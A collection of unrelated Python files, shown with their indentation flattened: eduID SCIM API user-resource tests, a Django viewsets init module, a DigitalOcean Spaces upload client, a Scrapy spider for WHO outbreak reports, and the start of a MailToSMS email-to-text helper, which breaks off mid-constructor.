import json
import logging
import unittest
from dataclasses import asdict, dataclass
from datetime import datetime, timedelta
from typing import Any, Dict, Mapping, Optional
from uuid import UUID, uuid4
import bson
from bson import ObjectId
from falcon.testing import Result
from eduid_userdb.testing import normalised_data
from eduid_scimapi.db.eventdb import EventStatus
from eduid_scimapi.db.userdb import ScimApiProfile, ScimApiUser
from eduid_scimapi.schemas.scimbase import Email, Meta, Name, PhoneNumber, SCIMResourceType, SCIMSchema
from eduid_scimapi.schemas.user import NutidUserExtensionV1, Profile, User, UserResponse, UserResponseSchema
from eduid_scimapi.testing import ScimApiTestCase
from eduid_scimapi.utils import filter_none, make_etag
logger = logging.getLogger(__name__)
class TestScimUser(unittest.TestCase):
def setUp(self) -> None:
self.maxDiff = None
self.user_doc1 = {
"_id": ObjectId("5e5542db34a4cf8015e62ac8"),
"scim_id": "9784e1bf-231b-4eb8-b315-52eb46dd7c4b",
"external_id": "hubba-bubba@eduid.se",
"name": {
"family_name": "Testsson",
"formatted": "Test Testsson",
"given_name": "Test",
"honorific_prefix": "Dr",
"honorific_suffix": "III",
"middle_name": "Testaren",
},
"emails": [{"primary": True, "type": "home", "value": "test@example.com"}],
"phone_numbers": [{"primary": True, "type": "mobile", "value": "tel:+1-202-456-1414"}],
"preferred_language": "en",
"version": ObjectId("5e5e6829f86abf66d341d4a2"),
"created": datetime.fromisoformat("2020-02-25T15:52:59.745"),
"last_modified": datetime.fromisoformat("2020-02-25T15:52:59.745"),
"profiles": {"student": {"attributes": {"displayName": "Test"}}},
}
def test_load_old_user(self):
user = ScimApiUser.from_dict(self.user_doc1)
self.assertEqual(user.profiles['student'].attributes['displayName'], 'Test')
# test to-dict+from-dict consistency
user2 = ScimApiUser.from_dict(user.to_dict())
self.assertEqual(asdict(user), asdict(user2))
def test_to_scimuser_doc(self):
db_user = ScimApiUser.from_dict(self.user_doc1)
meta = Meta(
location=f'http://example.org/Users/{db_user.scim_id}',
resource_type=SCIMResourceType.USER,
created=db_user.created,
last_modified=db_user.last_modified,
version=db_user.version,
)
user_response = UserResponse(
id=db_user.scim_id,
meta=meta,
external_id=db_user.external_id,
name=Name(**asdict(db_user.name)),
emails=[Email(**asdict(email)) for email in db_user.emails],
phone_numbers=[PhoneNumber(**asdict(number)) for number in db_user.phone_numbers],
preferred_language='en',
schemas=[SCIMSchema.CORE_20_USER, SCIMSchema.NUTID_USER_V1],
groups=[],
nutid_user_v1=NutidUserExtensionV1(
profiles={name: Profile(**asdict(profile)) for name, profile in db_user.profiles.items()}
),
)
scim = UserResponseSchema().dumps(user_response, sort_keys=True)
# Validation does not occur on serialization
UserResponseSchema().loads(scim)
expected = {
"emails": [{"primary": True, "type": "home", "value": "test@example.com"}],
"externalId": "hubba-bubba@eduid.se",
"groups": [],
SCIMSchema.NUTID_USER_V1.value: {
"profiles": {"student": {"attributes": {"displayName": "Test"}, "data": {}}},
},
"id": "9784e1bf-231b-4eb8-b315-52eb46dd7c4b",
"meta": {
"created": "2020-02-25T15:52:59.745000",
"lastModified": "2020-02-25T15:52:59.745000",
'location': f'http://example.org/Users/{db_user.scim_id}',
"resourceType": "User",
"version": "W/\"5e5e6829f86abf66d341d4a2\"",
},
"name": {
"familyName": "Testsson",
"formatted": "Test Testsson",
"givenName": "Test",
"honorificPrefix": "Dr",
"honorificSuffix": "III",
"middleName": "Testaren",
},
"phoneNumbers": [{"primary": True, "type": "mobile", "value": "tel:+1-202-456-1414"}],
"preferredLanguage": "en",
"schemas": [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
}
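        # meta.version is serialized as a weak ETag, W/"<version ObjectId>".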
assert json.loads(scim) == expected
def test_to_scimuser_no_external_id(self):
user_doc2 = {
'_id': ObjectId('5e81c5f849ac2cd87580e500'),
'scim_id': 'a7851d21-eab9-4caa-ba5d-49653d65c452',
'version': ObjectId('5e81c5f849ac2cd87580e502'),
'created': datetime.fromisoformat('2020-03-30T10:12:08.528'),
'last_modified': datetime.fromisoformat('2020-03-30T10:12:08.531'),
'profiles': {'student': {'data': {}}},
}
db_user = ScimApiUser.from_dict(user_doc2)
meta = Meta(
location=f'http://example.org/Users/{db_user.scim_id}',
resource_type=SCIMResourceType.USER,
created=db_user.created,
last_modified=db_user.last_modified,
version=db_user.version,
)
user_response = UserResponse(
id=db_user.scim_id,
meta=meta,
schemas=[SCIMSchema.CORE_20_USER, SCIMSchema.NUTID_USER_V1],
external_id=db_user.external_id,
groups=[],
nutid_user_v1=NutidUserExtensionV1(
profiles={name: Profile(**asdict(profile)) for name, profile in db_user.profiles.items()}
),
)
scim = UserResponseSchema().dumps(user_response)
# Validation does not occur on serialization
UserResponseSchema().loads(scim)
expected = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
"id": "a7851d21-eab9-4caa-ba5d-49653d65c452",
"phoneNumbers": [],
SCIMSchema.NUTID_USER_V1.value: {"profiles": {"student": {"data": {}, "attributes": {}}}},
"meta": {
"version": "W/\"5e81c5f849ac2cd87580e502\"",
"created": "2020-03-30T10:12:08.528000",
"resourceType": "User",
"lastModified": "2020-03-30T10:12:08.531000",
'location': f'http://example.org/Users/{db_user.scim_id}',
},
"name": {},
"groups": [],
"emails": [],
}
assert json.loads(scim) == expected
def test_bson_serialization(self):
user = ScimApiUser.from_dict(self.user_doc1)
x = bson.encode(user.to_dict())
self.assertTrue(x)
@dataclass
class UserApiResult:
request: Mapping[str, Any]
result: Result
nutid_user: NutidUserExtensionV1
response: UserResponse
class TestUserResource(ScimApiTestCase):
def setUp(self) -> None:
super().setUp()
self.test_profile = ScimApiProfile(attributes={'displayName': 'Test User 1'}, data={'test_key': 'test_value'})
def _assertUserUpdateSuccess(self, req: Mapping, response, user: ScimApiUser):
""" Function to validate successful responses to SCIM calls that update a user according to a request. """
if response.json.get('schemas') == [SCIMSchema.ERROR.value]:
self.fail(f'Got SCIM error response ({response.status}):\n{response.json}')
expected_schemas = req.get('schemas', [SCIMSchema.CORE_20_USER.value])
if SCIMSchema.NUTID_USER_V1.value in response.json and SCIMSchema.NUTID_USER_V1.value not in expected_schemas:
# The API can always add this extension to the response, even if it was not in the request
expected_schemas += [SCIMSchema.NUTID_USER_V1.value]
self._assertScimResponseProperties(response, resource=user, expected_schemas=expected_schemas)
# Validate user update specifics
assert user.external_id == response.json.get('externalId'), 'user.externalId != response.json.get("externalId")'
self._assertName(user.name, response.json.get('name'))
_expected_emails = filter_none(normalised_data([email.to_dict() for email in user.emails]))
_obtained_emails = filter_none(normalised_data(response.json.get('emails', [])))
        assert _obtained_emails == _expected_emails, 'response.json.get("emails") != user.emails'
_expected_phones = filter_none(normalised_data([number.to_dict() for number in user.phone_numbers]))
_obtained_phones = filter_none(normalised_data(response.json.get('phoneNumbers', [])))
assert _obtained_phones == _expected_phones, 'response.json.get("phoneNumbers") != user.phone_numbers'
assert user.preferred_language == response.json.get(
'preferredLanguage'
), 'user.preferred_language != response.json.get("preferredLanguage")'
# If the request has NUTID profiles, ensure they are present in the response
if SCIMSchema.NUTID_USER_V1.value in req:
req_nutid = req[SCIMSchema.NUTID_USER_V1.value]
resp_nutid = response.json.get(SCIMSchema.NUTID_USER_V1.value)
self.assertEqual(
req_nutid, resp_nutid, 'Unexpected NUTID user data in response',
)
elif SCIMSchema.NUTID_USER_V1.value in response.json:
self.fail(f'Unexpected {SCIMSchema.NUTID_USER_V1.value} in the response')
# TODO: Should we implement this?
# def test_get_users(self):
# for i in range(9):
# self.add_user(identifier=str(uuid4()), external_id=f'test-id-{i}', profiles={'test': self.test_profile})
# response = self.client.simulate_get(path=f'/Users', headers=self.headers)
# self.assertEqual([SCIMSchema.API_MESSAGES_20_LIST_RESPONSE.value], response.json.get('schemas'))
# resources = response.json.get('Resources')
# self.assertEqual(self.userdb.db_count(), len(resources))
def _create_user(self, req: Dict[str, Any], expect_success: bool = True) -> UserApiResult:
if 'schemas' not in req:
_schemas = [SCIMSchema.CORE_20_USER.value]
if SCIMSchema.NUTID_USER_V1.value in req:
_schemas += [SCIMSchema.NUTID_USER_V1.value]
req['schemas'] = _schemas
result = self.client.simulate_post(path='/Users/', body=self.as_json(req), headers=self.headers)
if expect_success:
self._assertResponse(result, status_code=201)
response: UserResponse = UserResponseSchema().load(result.json)
return UserApiResult(request=req, nutid_user=response.nutid_user_v1, result=result, response=response)
def _update_user(
self, req: Dict[str, Any], scim_id: UUID, version: Optional[ObjectId], expect_success: bool = True
) -> UserApiResult:
if 'schemas' not in req:
_schemas = [SCIMSchema.CORE_20_USER.value]
if SCIMSchema.NUTID_USER_V1.value in req:
_schemas += [SCIMSchema.NUTID_USER_V1.value]
req['schemas'] = _schemas
if 'id' not in req:
req['id'] = str(scim_id)
_headers = dict(self.headers) # copy
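        # SCIM optimistic concurrency: the update carries the resource's
        # current version as a weak ETag in the If-Match header.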
if version:
_headers['IF-MATCH'] = make_etag(version)
result = self.client.simulate_put(path=f'/Users/{scim_id}', body=self.as_json(req), headers=_headers)
if expect_success:
self._assertResponse(result)
response: UserResponse = UserResponseSchema().load(result.json)
return UserApiResult(request=req, nutid_user=response.nutid_user_v1, result=result, response=response)
def test_get_user(self):
db_user = self.add_user(identifier=str(uuid4()), external_id='test-id-1', profiles={'test': self.test_profile})
response = self.client.simulate_get(path=f'/Users/{db_user.scim_id}', headers=self.headers)
_req = {SCIMSchema.NUTID_USER_V1.value: {'profiles': {'test': asdict(self.test_profile)}}}
self._assertUserUpdateSuccess(_req, response, db_user)
def test_create_users_with_no_external_id(self):
self.add_user(identifier=str(uuid4()), profiles={'test': self.test_profile})
self.add_user(identifier=str(uuid4()), profiles={'test': self.test_profile})
def test_create_user(self):
req = {
'externalId': 'test-id-1',
'name': {'familyName': 'Testsson', 'givenName': 'Test', 'middleName': 'Testaren'},
'emails': [{'primary': True, 'type': 'home', 'value': 'test@example.com'}],
'phoneNumbers': [{'primary': True, 'type': 'mobile', 'value': 'tel:+1-202-456-1414'}],
'preferredLanguage': 'en',
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'Test User 1'}, 'data': {'test_key': 'test_value'}}
},
},
}
result = self._create_user(req)
# Load the created user from the database, ensuring it was in fact created
db_user = self.userdb.get_user_by_external_id(req['externalId'])
self.assertIsNotNone(db_user, 'Created user not found in the database')
self._assertUserUpdateSuccess(result.request, result.result, db_user)
# check that the action resulted in an event in the database
events = self.eventdb.get_events_by_resource(SCIMResourceType.USER, db_user.scim_id)
assert len(events) == 1
event = events[0]
assert event.resource.external_id == req['externalId']
assert event.data['status'] == EventStatus.CREATED.value
def test_create_and_update_user(self):
""" Test that creating a user and then updating it without changes only results in one event """
req = {
'externalId': 'test-id-1',
'name': {'familyName': 'Testsson', 'givenName': 'Test', 'middleName': 'Testaren'},
'emails': [{'primary': True, 'type': 'home', 'value': 'test@example.com'}],
'phoneNumbers': [{'primary': True, 'type': 'mobile', 'value': 'tel:+1-202-456-1414'}],
'preferredLanguage': 'en',
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'Test User 1'}, 'data': {'test_key': 'test_value'}}
},
},
}
result1 = self._create_user(req)
# check that the action resulted in an event in the database
events1 = self.eventdb.get_events_by_resource(SCIMResourceType.USER, result1.response.id)
assert len(events1) == 1
event = events1[0]
assert event.resource.external_id == req['externalId']
assert event.data['status'] == EventStatus.CREATED.value
# Update the user without making any changes
result2 = self._update_user(req, result1.response.id, result1.response.meta.version)
# Make sure the version wasn't updated
assert result1.response.meta.version == result2.response.meta.version
# Make sure no additional event was created
events2 = self.eventdb.get_events_by_resource(SCIMResourceType.USER, result2.response.id)
assert len(events2) == 1
assert events1 == events2
def test_create_user_no_external_id(self):
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'Test User 1'}, 'data': {'test_key': 'test_value'}}
},
},
}
response = self.client.simulate_post(path='/Users/', body=self.as_json(req), headers=self.headers)
self._assertResponse(response, status_code=201)
# Load the created user from the database, ensuring it was in fact created
db_user = self.userdb.get_user_by_scim_id(response.json['id'])
self.assertIsNotNone(db_user, 'Created user not found in the database')
self._assertUserUpdateSuccess(req, response, db_user)
def test_create_user_duplicated_external_id(self):
external_id = 'test-id-1'
# Create an existing user in the db
self.add_user(identifier=str(uuid4()), external_id=external_id, profiles={'test': self.test_profile})
# Try to create a new user with the same external_id
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
'externalId': external_id,
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {'test': {'attributes': {'displayName': 'Test User 2'}, 'data': {'test_key': 'test_value'}}}
},
}
response = self.client.simulate_post(path='/Users/', body=self.as_json(req), headers=self.headers)
self._assertScimError(
response.json, schemas=['urn:ietf:params:scim:api:messages:2.0:Error'], detail='externalID must be unique'
)
def test_update_user(self):
db_user = self.add_user(identifier=str(uuid4()), external_id='test-id-1', profiles={'test': self.test_profile})
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
'id': str(db_user.scim_id),
'externalId': 'test-id-1',
'name': {'familyName': 'Testsson', 'givenName': 'Test', 'middleName': 'Testaren'},
'emails': [{'primary': True, 'type': 'home', 'value': 'test@example.com'}],
'phoneNumbers': [{'primary': True, 'type': 'mobile', 'value': 'tel:+1-202-456-1414'}],
'preferredLanguage': 'en',
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'New display name'}, 'data': {'test_key': 'new value'}}
},
},
}
self.headers['IF-MATCH'] = make_etag(db_user.version)
response = self.client.simulate_put(
path=f'/Users/{db_user.scim_id}', body=self.as_json(req), headers=self.headers
)
self._assertResponse(response)
db_user = self.userdb.get_user_by_scim_id(response.json['id'])
self._assertUserUpdateSuccess(req, response, db_user)
# check that the action resulted in an event in the database
events = self.eventdb.get_events_by_resource(SCIMResourceType.USER, db_user.scim_id)
assert len(events) == 1
event = events[0]
assert event.resource.external_id == req['externalId']
assert event.data['status'] == EventStatus.UPDATED.value
def test_update_user_change_properties(self):
# Create the user
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
'externalId': 'test-id-1',
'name': {'familyName': 'Testsson', 'givenName': 'Test', 'middleName': 'Testaren'},
'emails': [{'primary': True, 'type': 'home', 'value': 'test@example.com'}],
'phoneNumbers': [{'primary': True, 'type': 'mobile', 'value': 'tel:+1-202-456-1414'}],
'preferredLanguage': 'en',
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'Test User 1'}, 'data': {'test_key': 'test_value'}}
},
},
}
create_response = self.client.simulate_post(path='/Users/', body=self.as_json(req), headers=self.headers)
self._assertResponse(create_response, status_code=201)
# Update the user
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
'id': create_response.json['id'],
'externalId': 'test-id-1',
'name': {'familyName': 'Testsson', 'givenName': 'Test', 'middleName': 'T'},
'emails': [{'primary': True, 'type': 'home', 'value': 'test2@example.com'}],
'phoneNumbers': [{'primary': True, 'type': 'mobile', 'value': 'tel:+5-555-555'}],
'preferredLanguage': 'sv-SE',
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {
'attributes': {'displayName': 'Another display name'},
'data': {'test_key': 'another value'},
}
},
},
}
self.headers['IF-MATCH'] = create_response.headers['etag']
response = self.client.simulate_put(
path=f'/Users/{create_response.json["id"]}', body=self.as_json(req), headers=self.headers
)
self._assertResponse(response)
db_user = self.userdb.get_user_by_scim_id(response.json['id'])
self._assertUserUpdateSuccess(req, response, db_user)
def test_update_user_set_external_id(self):
db_user = self.add_user(identifier=str(uuid4()), profiles={'test': self.test_profile})
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
'id': str(db_user.scim_id),
'externalId': 'test-id-1',
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'New display name'}, 'data': {'test_key': 'new value'}}
},
},
}
self.headers['IF-MATCH'] = make_etag(db_user.version)
response = self.client.simulate_put(
path=f'/Users/{db_user.scim_id}', body=self.as_json(req), headers=self.headers
)
self._assertResponse(response)
db_user = self.userdb.get_user_by_scim_id(response.json['id'])
self._assertUserUpdateSuccess(req, response, db_user)
def test_update_user_duplicated_external_id(self):
external_id = 'test-id-1'
# Create two existing users with different external_id
self.add_user(identifier=str(uuid4()), external_id=external_id, profiles={'test': self.test_profile})
db_user = self.add_user(identifier=str(uuid4()), external_id='test-id-2', profiles={'test': self.test_profile})
# Try to update the second user with the external_id of the first
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
'id': str(db_user.scim_id),
'externalId': external_id,
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'New display name'}, 'data': {'test_key': 'new value'}}
}
},
}
self.headers['IF-MATCH'] = make_etag(db_user.version)
response = self.client.simulate_put(
path=f'/Users/{db_user.scim_id}', body=self.as_json(req), headers=self.headers
)
self._assertScimError(
response.json, schemas=['urn:ietf:params:scim:api:messages:2.0:Error'], detail='externalID must be unique'
)
def test_search_user_external_id(self):
db_user = self.add_user(identifier=str(uuid4()), external_id='test-id-1', profiles={'test': self.test_profile})
self.add_user(identifier=str(uuid4()), external_id='test-id-2', profiles={'test': self.test_profile})
self._perform_search(filter=f'externalId eq "{db_user.external_id}"', expected_user=db_user)
def test_search_user_last_modified(self):
db_user1 = self.add_user(identifier=str(uuid4()), external_id='test-id-1', profiles={'test': self.test_profile})
db_user2 = self.add_user(identifier=str(uuid4()), external_id='test-id-2', profiles={'test': self.test_profile})
self.assertGreater(db_user2.last_modified, db_user1.last_modified)
self._perform_search(
filter=f'meta.lastModified ge "{db_user1.last_modified.isoformat()}"',
expected_num_resources=2,
expected_total_results=2,
)
self._perform_search(
filter=f'meta.lastModified gt "{db_user1.last_modified.isoformat()}"', expected_user=db_user2
)
def test_search_user_start_index(self):
for i in range(9):
self.add_user(identifier=str(uuid4()), external_id=f'test-id-{i}', profiles={'test': self.test_profile})
self.assertEqual(9, self.userdb.db_count())
last_modified = datetime.utcnow() - timedelta(hours=1)
self._perform_search(
filter=f'meta.lastmodified gt "{last_modified.isoformat()}"',
start=5,
return_json=True,
expected_num_resources=5,
expected_total_results=9,
)
def test_search_user_count(self):
for i in range(9):
self.add_user(identifier=str(uuid4()), external_id=f'test-id-{i}', profiles={'test': self.test_profile})
self.assertEqual(9, self.userdb.db_count())
last_modified = datetime.utcnow() - timedelta(hours=1)
self._perform_search(
filter=f'meta.lastmodified gt "{last_modified.isoformat()}"',
count=5,
return_json=True,
expected_num_resources=5,
expected_total_results=9,
)
def test_search_user_start_index_and_count(self):
for i in range(9):
self.add_user(identifier=str(uuid4()), external_id=f'test-id-{i}', profiles={'test': self.test_profile})
self.assertEqual(9, self.userdb.db_count())
last_modified = datetime.utcnow() - timedelta(hours=1)
self._perform_search(
filter=f'meta.lastmodified gt "{last_modified.isoformat()}"',
start=7,
count=5,
return_json=True,
expected_num_resources=3,
expected_total_results=9,
)
def _perform_search(
self,
filter: str,
start: int = 1,
count: int = 10,
return_json: bool = False,
expected_user: Optional[ScimApiUser] = None,
expected_num_resources: Optional[int] = None,
expected_total_results: Optional[int] = None,
):
        logger.info(f'Searching for user(s) using filter {repr(filter)}')
req = {
'schemas': [SCIMSchema.API_MESSAGES_20_SEARCH_REQUEST.value],
'filter': filter,
'startIndex': start,
'count': count,
}
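        # SCIM SearchRequest: a filter expression plus pagination;
        # startIndex is 1-based per the SCIM protocol.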
response = self.client.simulate_post(path='/Users/.search', body=self.as_json(req), headers=self.headers)
logger.info(f'Search response:\n{response.json}')
if return_json:
return response.json
self._assertResponse(response)
expected_schemas = [SCIMSchema.API_MESSAGES_20_LIST_RESPONSE.value]
response_schemas = response.json.get('schemas')
self.assertIsInstance(response_schemas, list, 'Response schemas not present, or not a list')
self.assertEqual(
sorted(set(expected_schemas)), sorted(set(response_schemas)), 'Unexpected schema(s) in search response'
)
resources = response.json.get('Resources')
if expected_user is not None:
expected_num_resources = 1
expected_total_results = 1
if expected_num_resources is not None:
self.assertEqual(
expected_num_resources,
len(resources),
f'Number of resources returned expected to be {expected_num_resources}',
)
if expected_total_results is None:
expected_total_results = expected_num_resources
if expected_total_results is not None:
self.assertEqual(
expected_total_results,
response.json.get('totalResults'),
f'Response totalResults expected to be {expected_total_results}',
)
if expected_user is not None:
self.assertEqual(
str(expected_user.scim_id),
resources[0].get('id'),
f'Search response user does not have the expected id: {str(expected_user.scim_id)}',
)
        return resources
# ---------------------------------------------------------------------------
# flake8: noqa
from .serializers import ViewSetSerializer
from .views import (
ViewSetCreateView, ViewSetDeleteView, ViewSetDetailView, ViewSetIndexView,
ViewSetListView, ViewSetUpdateView
)
from .viewsets import ModelViewSet, ViewSet
__version__ = '0.1.6'
default_app_config = 'viewsets.apps.ViewsetsConfig'
# ---------------------------------------------------------------------------
import uuid
import boto3
from botocore.exceptions import ClientError
from busy_beaver.config import (
DIGITALOCEAN_SPACES_BASE_URL,
DIGITALOCEAN_SPACES_BUCKET_NAME,
DIGITALOCEAN_SPACES_ENDPOINT_URL,
DIGITALOCEAN_SPACES_REGION_NAME,
LOGOS_FOLDER,
)
class S3Client:
def __init__(self, client_key, client_secret):
session = boto3.session.Session()
self.client = session.client(
"s3",
region_name=DIGITALOCEAN_SPACES_REGION_NAME,
endpoint_url=DIGITALOCEAN_SPACES_ENDPOINT_URL,
aws_access_key_id=client_key,
aws_secret_access_key=client_secret,
)
def find_bucket(self, bucket):
try:
self.client.head_bucket(Bucket=bucket)
except ClientError:
return False
return True
def create_bucket(self, bucket):
try:
self.client.create_bucket(Bucket=bucket, ACL="public-read")
except ClientError:
return False
return True
def delete_bucket(self, bucket):
try:
self.client.delete_bucket(Bucket=bucket)
except ClientError:
return False
return True
def upload_logo(self, filelike_object):
extension = filelike_object.filename.split(".")[-1]
filepath = f"{LOGOS_FOLDER}/{str(uuid.uuid4())}.{extension}"
response = self.client.put_object(
Bucket=DIGITALOCEAN_SPACES_BUCKET_NAME,
Body=filelike_object,
ACL="public-read",
Key=filepath,
)
status_code = response["ResponseMetadata"]["HTTPStatusCode"]
if status_code != 200:
raise Exception(
"Raise a FormValidation error; or maybe a different error to let me "
"know something went wrong and try again"
)
url = self._generate_url(filepath)
return url
def _generate_url(self, filepath):
return (
f"{DIGITALOCEAN_SPACES_BASE_URL}/"
f"{DIGITALOCEAN_SPACES_BUCKET_NAME}/"
f"{filepath}"
)
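
# Usage sketch (illustrative only; assumes valid DigitalOcean Spaces
# credentials and an uploaded file object with a `filename` attribute):
#
#   client = S3Client("SPACES_KEY", "SPACES_SECRET")
#   if not client.find_bucket(DIGITALOCEAN_SPACES_BUCKET_NAME):
#       client.create_bucket(DIGITALOCEAN_SPACES_BUCKET_NAME)
#   logo_url = client.upload_logo(uploaded_file)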
# ---------------------------------------------------------------------------
import scrapy
import json
from bs4 import BeautifulSoup
import re
import datetime
import logging
logging.basicConfig(filename='Error.log', level=logging.CRITICAL, format='%(asctime)s:%(levelname)s:%(name)s:%(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')
from PHASE_1.API_SourceCode.keyterms.key_terms import get_key_terms
from PHASE_1.API_SourceCode.disease.diseaseExtractor import diseaseExtractor
from PHASE_1.API_SourceCode.disease.syndromeExtractor import syndromeExtractor
from PHASE_1.API_SourceCode.dateparse.event_date import get_event_date
from PHASE_1.API_SourceCode.googlemaps.getPlaces import getPlaces, get_country
from PHASE_1.API_SourceCode.database.db import db_insert, db_urls
class WHOSpider(scrapy.Spider):
name = "WHO"
start_urls = [
'https://www.who.int/csr/don/archive/year/en/',
]
def parse(self, response):
years = response.css('div.col_2-1_1 ul li a::attr(href)').getall()
for year in years:
year = response.urljoin(year)
yield scrapy.Request(year, callback = self.parse_each_year)
def parse_each_year(self, response):
articleLinks = response.css('ul.auto_archive li a::attr(href)').getall()
urls = db_urls()
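        # db_urls() is assumed to return the article URLs already stored,
        # so previously scraped pages are skipped below.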
for articleLink in articleLinks:
articleLink = response.urljoin(articleLink)
if articleLink in urls:
continue
yield scrapy.Request(articleLink, callback = self.parse_individual_links)
def parse_individual_links(self, response):
soup = BeautifulSoup(response.body, 'html.parser')
headline = soup.find("h1", {"class": "headline"}).getText()
main_text = soup.find("div", {"id": "primary"})
        cover_date = response.xpath("//meta[@name='webit_cover_date']/@content")[0].extract()
        year = int(cover_date[0:4])
        month = int(cover_date[5:7])
        day = int(cover_date[8:10])
d1 = datetime.datetime(year, month, day)
d2 = datetime.datetime(2008, 3, 18)
if (d1 <= d2):
remove = main_text.find("p")
if (remove):
remove.decompose()
remove = main_text.find_all("div")
for div in remove:
div.decompose()
remove = main_text.find("ul", {"class": "list_dash"})
if (remove):
remove.decompose()
remove = main_text.find("em", {"class": "dateline"})
if (remove):
remove.decompose()
for h1 in main_text.find_all('h1'):
h1.decompose()
for h2 in main_text.find_all('h2'):
h2.decompose()
for h3 in main_text.find_all('h3'):
h3.decompose()
for h4 in main_text.find_all('h4'):
h4.decompose()
for h5 in main_text.find_all('h5'):
h5.decompose()
for h6 in main_text.find_all('h6'):
h6.decompose()
main_text = main_text.getText()
        # Remove captions: one or more '*' followed by text up to a period
        main_text = re.sub(r"\*+.*\.", '', main_text)
        # Remove source attributions ("Source: ...")
        main_text = re.sub(r"Source: .*\S", '', main_text)
        # Collapse all whitespace to single spaces
        main_text = re.sub('\n', ' ', main_text)
        main_text = re.sub('\t', ' ', main_text)
        main_text = re.sub('\r', ' ', main_text)
        main_text = re.sub(' +', ' ', main_text)
url = response.url
        date_of_publication = cover_date
headline = headline.strip()
main_text = main_text.strip()
data = {
'url': url,
'date_of_publication': date_of_publication,
'headline': headline,
'main_text': main_text
}
try:
diseases = diseaseExtractor(main_text, headline, date_of_publication)
syndromes = syndromeExtractor(main_text)
event_date = get_event_date(main_text, date_of_publication)
country = get_country(headline)
locations = getPlaces(main_text, [country])
report = {
'diseases': diseases,
'syndromes': syndromes,
'event_date': event_date,
'locations': locations
}
key_terms = get_key_terms(headline, main_text)
data['key_terms'] = list(set(key_terms + diseases + syndromes))
data['reports'] = [report]
db_insert(data)
except Exception as e:
logging.critical("%s %s %s" % (date_of_publication, url, e))
# filename = response.xpath("//meta[@name='webit_cover_date']/@content")[0].extract() + " " + headline
# filename = filename.replace('/', " ")
# with open(filename + ".json", 'w') as outfile:
# json.dump(data, outfile, ensure_ascii = False)
# ---------------------------------------------------------------------------
from __future__ import print_function
import json
import os
import yagmail
import phonenumbers
class MailToSMS:
"""MailToSMS
This module implements a basic api for sending text messages via email using yagmail.
Arguments:
number {string|int}: The destination phone number (ex. 5551234567)
carrier {string}: The destination phone number's carrier (ex. "att")
username {string} [optional]: The username for accessing the SMTP server (ex. "username").
If omitted, it'll try to use the username stored in the .yagmail file.
See: https://github.com/kootenpv/yagmail#username-and-password
password {string} [optional]: The password for accessing the SMTP server (ex. "password").
If using Gmail and 2FA, you may want to use an app password.
If omitted, it'll try to use yagmail's password in the keyring, otherwise it'll prompt you for the password.
See: https://github.com/kootenpv/yagmail#username-and-password
contents {yagmail contents} [optional]: A yagmail friendly contents argument (ex. "This is a message.").
See: https://github.com/kootenpv/yagmail#magical-contents
If omitted, you can manually use MailToSMS's send method.
keyworded args (for extra configuration):
quiet {boolean}: Choose to disable printed statements. Defaults to False. (ex. quiet=True)
region {string}: The region of the destination phone number. Defaults to "US". (ex. region="US")
This should only be necessary when using a non international phone number that's not US based.
See: https://github.com/daviddrysdale/python-phonenumbers
        mms {boolean}: Choose to send an MMS message instead of an SMS message; falls back to SMS if the carrier has no MMS gateway. Defaults to False. (ex. mms=True)
subject {string}: The subject of the email to send (ex. subject="This is a subject.")
yagmail {list}: A list of arguments to send to the yagmail.SMTP() constructor. (ex. yagmail=["my.smtp.server.com", "12345"])
As of 4/30/17, the args and their defaults (after the username and password) are:
host='smtp.gmail.com', port='587', smtp_starttls=True, smtp_set_debuglevel=0, smtp_skip_login=False, encoding="utf-8"
This is unnecessary if you're planning on using the basic Gmail interface,
in which case you'll just need the username and password.
See: https://github.com/kootenpv/yagmail/blob/master/yagmail/yagmail.py#L49
Examples:
from mail_to_sms import MailToSMS
MailToSMS(5551234567, "att", "username@gmail.com", "password", "this is a message")
MailToSMS("5551234567", "att", "username", "password", ["hello", "world"], subject="hey!")
MailToSMS(5551234567, "att", "username", "password", "hello world!", yagmail=["smtp.gmail.com", "587"])
MailToSMS("5551234567", "att", "username@gmail.com", "password", ["line one"], yagmail=["smtp.gmail.com"])
mail = MailToSMS(5551234567, "att", "username", "password")
mail.send("this is a string!")
Requirements:
yagmail
phonenumbers
click (for the CLI)
"""
## Config
GATEWAYS_JSON_PATH = os.path.join(os.path.dirname(__file__), "gateways.json")
GATEWAYS_KEY = "gateways"
CARRIER_KEY = "carrier"
SMS_KEY = "sms"
MMS_KEY = "mms"
QUIET_KEY = "quiet"
REGION_KEY = "region"
SUBJECT_KEY = "subject"
YAGMAIL_KEY = "yagmail"
## Defaults
DEFAULT_QUIET = False
DEFAULT_TO_MMS = False
DEFAULT_REGION = "US"
DEFAULT_SUBJECT = None
DEFAULT_YAGMAIL_ARGS = []
def __init__(self, number, carrier, username=None, password=None, contents=None, **kwargs):
## Explicitly define the available configs and their defaults (if necessary)
self.config = {
"quiet": kwargs.get(self.QUIET_KEY, self.DEFAULT_QUIET),
"region": kwargs.get(self.REGION_KEY, self.DEFAULT_REGION),
